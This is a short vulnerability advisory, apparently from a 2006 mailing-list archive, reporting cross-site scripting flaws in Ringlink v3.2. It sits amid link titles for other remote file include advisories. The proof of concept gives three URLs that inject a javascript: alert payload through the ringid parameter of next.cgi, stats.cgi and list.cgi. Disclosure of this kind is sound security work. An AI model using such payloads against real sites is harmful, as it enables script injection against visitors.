Related information Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl) Enterprise TimeSheet and Payroll (EPS) <= v.1.1 Remote File Include Vulnerability MailEnable Enterprise Edition ASP Version <= 2.0 phpOnDirectory (CONST_INCLUDE_RO OT) <= v.1.0 Remote File Include Vulnerability aePartner (dir[data]) <= v.0.8.3 Remote File Include Vulnerability From:luny_(at)_youfucktard.com <luny_(at)_youfucktard.com> Date:11.06.2006Subject:Ringlink v3.2 - XSSRinglink v3.2 Homepage: http://www.ringlink.org Effected files: next.cgi stats.cgi list.cgi XSS Vulnerability PoC: http://www.example.com/ringlink/next.cgi?ringid=[IMG%20SRC=javascript:alert('XSS')] http://www.example.com/ringlink/stats.cgi?ringid=[IMG%20SRC=javascript:alert('XSS')] http://www.example.com/ringlink/list.cgi?ringid=[IMG%20SRC=javascript:alert('XSS')]
Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
Enterprise TimeSheet and Payroll (EPS) <= v.1.1 Remote File Include Vulnerability
MailEnable Enterprise Edition ASP Version <= 2.0
phpOnDirectory (CONST_INCLUDE_RO OT) <= v.1.0 Remote File Include Vulnerability
aePartner (dir[data]) <= v.0.8.3 Remote File Include Vulnerability
